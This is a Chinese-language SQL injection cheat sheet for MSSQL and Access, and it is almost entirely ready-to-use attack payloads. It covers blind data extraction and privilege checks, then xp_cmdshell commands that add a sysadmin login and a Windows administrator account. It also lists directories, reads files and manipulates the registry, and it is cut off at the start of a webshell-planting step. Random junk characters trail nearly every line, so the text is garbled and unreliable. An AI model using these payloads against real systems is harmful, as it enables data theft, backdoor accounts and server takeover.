1.判断是否有注入;and 1=1 ;and 1=2 Rg<y8~|'}
2.初步判断是否是mssql ;and user>0 N4!YaQQ;}
Zi$a6
3.注入参数是字符'and [查询条件] and ''=' *Au4q<
;M8N%
4.搜索时没过滤参数的'and [查询条件] and '%25'=' vuuID24:
W5$jIQ}Bw
5.判断数据库系统 Z4}Yw{=f
$J[h(>-X
;and (select count(*) from sysobjects)>0 mssql FOB9CsMe
1>bkVA
;and (select count(*) from msysobjects)>0 access m^U\l9LE
)8ctNpQt
9/D+6hJ]:
go6Hb>
6.猜数据库 ;and (select Count(*) from [数据库名])>0 a~OCo
,nMLua\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ,f$A5RN
Qz{:m
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 c G?RisSZ
ex $d~
9.(1)猜字段的ascii值(access) h(d<':|
zdyS"H}
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 6h}f^eJ:K,
^qiTO`lg
(2)猜字段的ascii值(mssql) LB? evewu
J\_tigd
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 (o{QSk\
vb9G_Pfz
10.测试权限结构(mssql) .zlUN0oe
; z :}OD
h_?D%b~5
h\C
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |=l;UqB
-DX|[70
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >T.U\,om7
e.\d7_T+
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Hh$D:ZO
$"J+3mO
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- fcr\XCG7U
{qx}f^WV
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- +q)
^pCC
r4Pm
i
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 3?Bq((
cliP+#
;and 1=(select IS_MEMBER('db_owner'));-- n1DD+@
j?/T7a^
W)<us?5Ec5
*M/3 1qI
11.添加mssql和系统的帐户 FlD
!?
GpN tvo~
;exec master.dbo.sp_addlogin username;-- \4~uop,Nb+
;exec master.dbo.sp_password null,username,password;-- ff?:_q+.N
65=i`!f
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N#C,_ k
&Dqg<U
;exec master.dbo.xp_cmdshell 'net user username password H~J#!3
AmRppbj/wO
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Th`IpxV
/JtKn*?}:>
;exec master.dbo.xp_cmdshell 'net user username password /add';-- \W(C=e
hn)mNb!
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- a5?Rj~h!<
Pf]6'?kQ
3VB{Qj
$eX ;
2
12.(1)遍历目录 0#G&8*FMN
m-5Dbx!j
;create table dirs(paths varchar(100), id int) zYYc#N/
E>KV1P
;insert dirs exec master.dbo.xp_dirtree 'c:\' IBQmm(+v
Ts|&_|
;and (select top 1 paths from dirs)>0 syv6" 2Z'B
Xko[Z;4v8'
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) K)sO
(3%NudkwT
NL0X =i
"npj%O<bd
(2)遍历目录 )<1M'2
]5YG*sD4
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- lk%rE
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 qdL;Ii<Y0
}Wn6r_:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 hR[Qdu6r
Q^DKKp
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %S]5wR6;_
f<!eJO:<'
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 zRD{"uqi
z4&|~-m,
1
BAnf9
y2TJDb1
13.mssql中的存储过程 xx#;)]WT
9%$4Ux*q
xp_regenumvalues 注册表根键, 子键 X[(u]h`
<S6|$7{1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (YGJw?]
|TkMrj0
xp_regread 根键,子键,键值名 FlrLXTx0
Yr,e7da
;exec xp_regread g&\A1H
Z[FSy-;"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 kZ[E493bV
v5; c}n
xp_regwrite 根键,子键, 值名, 值类型, 值 |bO}|X
[q?{e1
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 QApil
0V}%'Ec<e
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 [L{q
B7fURL
Rqr
xp_regdeletevalue 根键,子键,值名 Z<0M_q9?MO
R8W{[@
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Mf<Pms\F
|jU/R
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 egYJ.ZzF0
C^2Tql
\.POb5]p0
aHXd1\6m
14.mssql的backup创建webshell tOn/r@Fd^E
2Rc#{A
use model Oq|RMl
H .JA)*b-
create table cmd(str image); ,&G